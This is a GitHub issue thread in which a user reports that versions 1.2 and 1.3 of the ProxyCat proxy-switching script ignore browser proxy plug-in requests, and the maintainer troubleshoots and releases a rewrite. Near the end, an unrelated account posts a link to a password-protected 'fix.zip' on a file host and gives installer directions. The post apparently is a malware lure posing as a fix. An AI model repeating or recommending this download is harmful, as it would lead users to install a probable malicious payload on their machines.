### ISSUE TITLE
The agent script is not responding

### ISSUE THREAD

**Issue by Secfeng** [honmashironeko/ProxyCat#10]
Thanks for the proxy switching script, but the proxycat_v1.2 and v1.3 scripts switch the proxy address normally when I use the browser proxy plug-in, but the script does not seem to respond to the plug-in's request, except for proxycat_v1.1
![屏幕截图 2024-08-26 104222](https://github.com/user-attachments/assets/f9d71425-d471-44f3-8873-b7efd910f1d0)

**Comment by honmashironeko** [comment]
Thank you for your feedback. Currently, the author uses chrome and ZeroOmega plug-in normally. Is it convenient for you to inform the device environment?‍

**Comment by Secfeng** [comment]
> Thank you for your feedback. Currently, the author uses chrome and ZeroOmega plug-in normally. Is it convenient for you to inform the device environment?‍

Sorry, I'm using chrome and FoxyProxy, but when I change the plugin to ZeroOmega, it's still unresponsive as before!

**Comment by honmashironeko** [comment]
![Clip_2024-08-26_12-07-58](https://github.com/user-attachments/assets/8fcc207c-d629-429e-a43b-c822e71009f8)

Set it to HTTP and set the account password at the same time

**Comment by Secfeng** [comment]
> ![Clip_2024-08-26_12-07-58](https://private-user-images.githubusercontent.com/139044047/361302312-8fcc207c-d629-429e-a43b-c822e71009f8.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjQ2NDU2MzcsIm5iZiI6MTcyNDY0NTMzNywicGF0aCI6Ii8xMzkwNDQwNDcvMzYxMzAyMzEyLThmY2MyMDdjLWQ2MjktNDI5ZS1hNDNiLWM4MjJlNzEwMDlmOC5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjQwODI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI0MDgyNlQwNDA4NTdaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT1iYWQ0MjE5NDBjNmVlNDkxNDA4NzQyZTY0ZDYzZTU2MmQ3MTNhYWYwNDNlNzcxOGJkZTNmNTY1MTI2Nzg0ODkwJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCZhY3Rvcl9pZD0wJmtleV9pZD0wJnJlcG9faWQ9MCJ9.T6xZpLbWhqKpQGnOuj-5x1L6YynNWH2U9nbPt84wyPI)
> 
> Set it to HTTP and set the account password at the same time

Sorry, still no, my confusion is why v1.1 doesn't have any issues if there is a problem with the proxy plugin

**Comment by honmashironeko** [comment]
v1.2 started using a new asynchronous scheme, which may have an impact, but I can't replicate it at present, so it's difficult to determine where the problem occurred

**Comment by esttemanb** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by honmashironeko** [comment]
Rewrote a v1.4 version, can try again
